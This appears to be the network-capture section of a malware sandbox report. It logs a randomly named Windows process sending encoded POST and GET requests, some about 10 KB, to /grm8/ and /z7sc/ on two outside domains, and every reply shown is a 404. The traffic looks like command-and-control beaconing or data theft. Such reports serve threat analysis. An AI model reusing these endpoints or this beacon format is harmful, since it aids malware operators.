                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.449832209.74.77.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:29.168332100 CET723OUTPOST /grm8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.mindfulmo.life
                                                                Origin: http://www.mindfulmo.life
                                                                Referer: http://www.mindfulmo.life/grm8/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 47 56 32 6f 56 70 48 78 4e 39 77 61 77 6b 4b 54 4e 39 71 52 6e 43 79 73 54 4a 2f 78 39 4c 56 32 52 41 33 30 49 49 51 48 6c 52 30 37 36 69 4b 61 45 67 6d 51 33 2f 44 4d 4e 77 2b 2b 62 51 35 70 35 4b 75 67 6b 57 34 47 36 30 54 42 75 6a 6e 38 7a 5a 4c 79 56 59 46 45 55 30 64 55 36 73 66 43 56 76 34 63 52 4e 34 41 48 47 2f 30 2b 70 44 51 62 4e 6a 69 7a 47 55 45 50 48 32 33 48 61 42 38 4b 76 59 30 67 30 43 6a 51 34 72 71 69 47 76 4c 6a 57 79 32 4c 36 4f 58 42 37 38 5a 47 78 39 6a 4c 4b 59 66 30 58 63 75 35 47 75 69 35 51 57 36 61 49 45 51 4b 4d 64 32 77 63 4f 59 52 58 67 38 63 41 3d 3d
                                                                Data Ascii: pFYX4n=GV2oVpHxN9wawkKTN9qRnCysTJ/x9LV2RA30IIQHlR076iKaEgmQ3/DMNw++bQ5p5KugkW4G60TBujn8zZLyVYFEU0dU6sfCVv4cRN4AHG/0+pDQbNjizGUEPH23HaB8KvY0g0CjQ4rqiGvLjWy2L6OXB78ZGx9jLKYf0Xcu5Gui5QW6aIEQKMd2wcOYRXg8cA==
                                                                Dec 10, 2024 12:18:30.467597008 CET533INHTTP/1.1 404 Not Found
                                                                Date: Tue, 10 Dec 2024 11:18:30 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.449838209.74.77.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:31.827893019 CET743OUTPOST /grm8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.mindfulmo.life
                                                                Origin: http://www.mindfulmo.life
                                                                Referer: http://www.mindfulmo.life/grm8/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 47 56 32 6f 56 70 48 78 4e 39 77 61 7a 45 36 54 4f 65 79 52 67 69 79 6a 57 4a 2f 78 30 72 56 71 52 41 37 30 49 4a 6b 78 6c 6e 6b 37 30 6e 32 61 46 68 6d 51 37 66 44 4d 5a 67 2b 33 55 77 35 75 35 4b 69 6f 6b 58 55 47 36 33 76 42 75 6a 58 38 79 75 58 78 56 49 46 4b 66 55 64 57 2b 73 66 43 56 76 34 63 52 4e 38 71 48 47 58 30 2f 61 72 51 42 76 4c 39 74 57 55 48 49 48 32 33 44 61 42 34 4b 76 59 7a 67 31 65 5a 51 37 44 71 69 44 72 4c 67 48 79 33 41 36 4f 52 50 62 39 79 4a 43 45 63 49 49 68 4f 2b 30 45 35 78 32 36 6a 34 57 62 67 4c 35 6c 48 59 4d 35 46 74 62 48 73 63 55 64 31 48 42 34 45 46 49 54 2f 77 61 4f 63 74 78 78 38 74 5a 53 70 34 68 55 3d
                                                                Data Ascii: pFYX4n=GV2oVpHxN9wazE6TOeyRgiyjWJ/x0rVqRA70IJkxlnk70n2aFhmQ7fDMZg+3Uw5u5KiokXUG63vBujX8yuXxVIFKfUdW+sfCVv4cRN8qHGX0/arQBvL9tWUHIH23DaB4KvYzg1eZQ7DqiDrLgHy3A6ORPb9yJCEcIIhO+0E5x26j4WbgL5lHYM5FtbHscUd1HB4EFIT/waOctxx8tZSp4hU=
                                                                Dec 10, 2024 12:18:33.030374050 CET533INHTTP/1.1 404 Not Found
                                                                Date: Tue, 10 Dec 2024 11:18:32 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.449845209.74.77.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:34.495098114 CET10825OUTPOST /grm8/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.mindfulmo.life
                                                                Origin: http://www.mindfulmo.life
                                                                Referer: http://www.mindfulmo.life/grm8/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 47 56 32 6f 56 70 48 78 4e 39 77 61 7a 45 36 54 4f 65 79 52 67 69 79 6a 57 4a 2f 78 30 72 56 71 52 41 37 30 49 4a 6b 78 6c 6e 73 37 30 52 43 61 45 43 4f 51 36 66 44 4d 61 67 2b 79 55 77 34 72 35 4f 47 73 6b 58 6f 34 36 79 6a 42 74 41 76 38 36 2f 58 78 4d 34 46 4b 43 45 64 56 36 73 65 57 56 76 4a 56 52 4e 73 71 48 47 58 30 2f 63 58 51 50 74 6a 39 76 57 55 45 50 48 32 42 48 61 42 55 4b 75 77 46 67 31 4b 7a 51 4b 6a 71 6c 6a 37 4c 76 56 61 33 4e 36 4f 54 43 37 39 71 4a 44 34 39 49 49 39 43 2b 33 59 66 78 30 6d 6a 37 69 75 52 62 59 4e 6e 50 4c 42 55 75 34 37 33 48 30 56 5a 4d 54 59 4f 4f 64 4c 31 72 2b 36 6a 77 6a 63 70 79 38 2b 73 6d 45 35 43 2b 2f 65 78 56 4f 56 79 70 63 42 50 34 46 68 74 50 73 62 30 45 33 65 64 36 77 42 32 70 49 77 4f 4b 66 6d 41 78 53 67 72 79 47 79 43 47 63 54 66 2f 7a 75 54 4f 68 77 2b 67 74 5a 57 69 49 58 6d 6e 4e 79 51 63 73 48 52 66 41 54 76 76 6e 53 70 73 36 46 2f 52 7a 6b 5a 33 4a 34 33 44 38 55 41 44 70 61 76 65 38 4f 42 31 51 67 43 4d 33 58 6c 75 61 57 [TRUNCATED]
                                                                Data Ascii: pFYX4n=GV2oVpHxN9wazE6TOeyRgiyjWJ/x0rVqRA70IJkxlns70RCaECOQ6fDMag+yUw4r5OGskXo46yjBtAv86/XxM4FKCEdV6seWVvJVRNsqHGX0/cXQPtj9vWUEPH2BHaBUKuwFg1KzQKjqlj7LvVa3N6OTC79qJD49II9C+3Yfx0mj7iuRbYNnPLBUu473H0VZMTYOOdL1r+6jwjcpy8+smE5C+/exVOVypcBP4FhtPsb0E3ed6wB2pIwOKfmAxSgryGyCGcTf/zuTOhw+gtZWiIXmnNyQcsHRfATvvnSps6F/RzkZ3J43D8UADpave8OB1QgCM3XluaWCIWyL1xLxCsxOQqtEFusYwGDzGAMu2xVvZlT1wciuJkqkK+vSiH8BeuszThNYC8mSPLi41jjEzX81YuZX+DRLxb69JWPaGZPUBwICl4VrKjIAIFvbF2mjQjFWHHx20mMJJn+M/hDpia12GZjgrzz25W/KvUMKrqOlyF3PZzynYwMZP4Rr3wLG0Eiijz0CpGRvA8E6YXuF2+QDI8bDFHbxxKHmRAwoL7g3Tx/Z1q6q2LQ3aaQJ1XvKKUYnkO0PH7R287p4no4Hn2fYf1iFWgnWAugAImRq1AIXqfmVPYMRg38kfAl1Pa2xxNBvL2z32AVSzUeTOUVj2r1zJipY9CCbc03Iu3VGWgimmzvs9V6gRujgZqq+omjKD3+lPCtvtxB6NlVjz7bsFLMdiidE2a0NjnwebwkkmEHRAtNVYVT7sQtSvYeVCEJ5VXoCNykq1rOvs4fgypAxUYCJmUbaclX11F4Jnj4OGQCkgX2ZbxxPtn7JESXXuO2iWdIqakdqdFsMdlSmM9UqltUCT39Shl42prckA4NDNRigcmOiOc/nEO39H5vjnL6Io+FR4QVoFxnxV09SMD/9M6DqamiB2MxBC0aw/JqZnsL2lWZ+hiSJz2MzdDNF0h866ESr61Ri3o0+6myEfWQMHmrBtbfDS7Wfq5fhRwuSppHmL [TRUNCATED]
                                                                Dec 10, 2024 12:18:35.703543901 CET533INHTTP/1.1 404 Not Found
                                                                Date: Tue, 10 Dec 2024 11:18:35 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.449854209.74.77.108804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:37.149693012 CET455OUTGET /grm8/?pFYX4n=LXeIWcjRI+0vwDaWL9fWp1e5SYfZj51vPQ+DeJcDhGcq3DSHHwCG/Mepb2eQXiRJ2aihtUY8szHS/Cbz5IjtUJQdZlknt7OQMPZ7VewdY2i1/aDXKfCCmB0=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.mindfulmo.life
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:18:38.368654966 CET548INHTTP/1.1 404 Not Found
                                                                Date: Tue, 10 Dec 2024 11:18:38 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.44987135.220.176.144804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:45.248603106 CET729OUTPOST /z7sc/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.bienmaigrir.info
                                                                Origin: http://www.bienmaigrir.info
                                                                Referer: http://www.bienmaigrir.info/z7sc/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 6f 72 61 6b 31 30 57 53 6f 49 69 55 69 57 69 4e 56 69 56 52 68 45 55 75 65 6a 69 51 6f 6a 71 39 35 77 43 4c 6e 70 45 78 62 6f 38 47 57 36 43 37 35 7a 4c 76 4b 61 6e 58 4c 63 54 2b 45 63 35 38 62 6e 51 4e 41 78 34 6a 72 35 41 75 4c 4d 4a 74 68 38 38 79 53 6b 73 64 56 4c 49 54 46 35 38 30 44 61 64 53 4b 68 6d 46 76 73 58 63 4a 76 2b 6e 66 69 56 32 41 54 38 72 66 58 44 6a 6b 43 32 63 4a 66 78 4e 30 44 50 61 32 4e 66 35 31 72 70 49 62 66 71 76 45 34 42 64 76 30 6b 6d 75 61 31 7a 39 72 4e 7a 33 44 32 53 39 74 6e 33 4d 49 58 74 30 76 5a 75 64 43 75 70 5a 69 4f 71 79 2b 47 30 4e 51 3d 3d
                                                                Data Ascii: pFYX4n=orak10WSoIiUiWiNViVRhEUuejiQojq95wCLnpExbo8GW6C75zLvKanXLcT+Ec58bnQNAx4jr5AuLMJth88ySksdVLITF580DadSKhmFvsXcJv+nfiV2AT8rfXDjkC2cJfxN0DPa2Nf51rpIbfqvE4Bdv0kmua1z9rNz3D2S9tn3MIXt0vZudCupZiOqy+G0NQ==
                                                                Dec 10, 2024 12:18:46.726954937 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:46 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.44988035.220.176.144804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:47.918504953 CET749OUTPOST /z7sc/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.bienmaigrir.info
                                                                Origin: http://www.bienmaigrir.info
                                                                Referer: http://www.bienmaigrir.info/z7sc/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 6f 72 61 6b 31 30 57 53 6f 49 69 55 6a 7a 79 4e 54 44 56 52 6e 6b 55 74 62 6a 69 51 78 54 71 35 35 77 4f 4c 6e 6f 41 68 62 61 59 47 57 65 47 37 2b 32 2f 76 66 61 6e 58 54 73 54 42 41 63 35 4a 62 6e 4e 2b 41 30 51 6a 72 35 55 75 4c 4d 35 74 67 4e 38 78 54 30 73 44 59 72 49 52 4b 5a 38 30 44 61 64 53 4b 68 69 38 76 73 66 63 49 66 4f 6e 66 41 74 33 47 6a 38 6f 59 58 44 6a 33 53 32 59 4a 66 78 6a 30 42 37 67 32 4f 6e 35 31 70 42 49 61 4f 71 77 4b 34 42 62 67 55 6c 6d 70 36 41 34 2f 62 41 59 76 6a 2b 74 36 4a 6d 58 4e 4f 61 33 6c 65 34 35 50 43 4b 61 45 6c 48 65 2f 39 37 39 57 66 38 39 79 6e 59 51 30 32 34 76 7a 55 2b 47 38 5a 46 44 38 73 59 3d
                                                                Data Ascii: pFYX4n=orak10WSoIiUjzyNTDVRnkUtbjiQxTq55wOLnoAhbaYGWeG7+2/vfanXTsTBAc5JbnN+A0Qjr5UuLM5tgN8xT0sDYrIRKZ80DadSKhi8vsfcIfOnfAt3Gj8oYXDj3S2YJfxj0B7g2On51pBIaOqwK4BbgUlmp6A4/bAYvj+t6JmXNOa3le45PCKaElHe/979Wf89ynYQ024vzU+G8ZFD8sY=
                                                                Dec 10, 2024 12:18:49.396903038 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:49 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.44988735.220.176.144804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:50.579222918 CET10831OUTPOST /z7sc/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.bienmaigrir.info
                                                                Origin: http://www.bienmaigrir.info
                                                                Referer: http://www.bienmaigrir.info/z7sc/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 6f 72 61 6b 31 30 57 53 6f 49 69 55 6a 7a 79 4e 54 44 56 52 6e 6b 55 74 62 6a 69 51 78 54 71 35 35 77 4f 4c 6e 6f 41 68 62 61 51 47 57 72 53 37 34 56 58 76 4e 71 6e 58 4e 63 54 36 41 63 35 51 62 6e 45 57 41 30 63 56 72 37 73 75 4c 74 5a 74 6f 66 55 78 4b 6b 73 44 48 37 49 51 46 35 39 77 44 61 4e 73 4b 68 53 38 76 73 66 63 49 64 6d 6e 49 43 56 33 45 6a 38 72 66 58 44 52 6b 43 32 38 4a 66 49 65 30 42 76 77 32 2b 48 35 32 4a 52 49 63 34 65 77 43 34 42 5a 6c 55 6c 49 70 36 63 33 2f 62 4d 2b 76 69 36 48 36 4f 57 58 4d 49 53 70 34 75 67 47 59 78 32 30 61 45 6a 38 34 74 7a 71 59 39 6b 31 31 31 77 78 75 6b 49 69 34 45 50 6b 37 72 42 67 2b 6f 58 64 53 7a 2b 79 68 42 4f 6c 51 6b 63 58 6c 67 64 43 6b 48 59 67 58 67 64 77 44 42 45 31 69 2b 61 44 36 4a 43 77 50 74 71 55 7a 6f 72 4b 65 6d 54 66 78 64 53 51 58 4d 55 47 5a 52 59 65 66 43 6b 54 59 78 38 74 7a 43 53 68 65 4b 67 38 62 66 6e 56 64 76 4e 58 54 66 36 51 45 71 66 6d 6c 36 32 6e 4f 45 2b 6f 7a 31 68 63 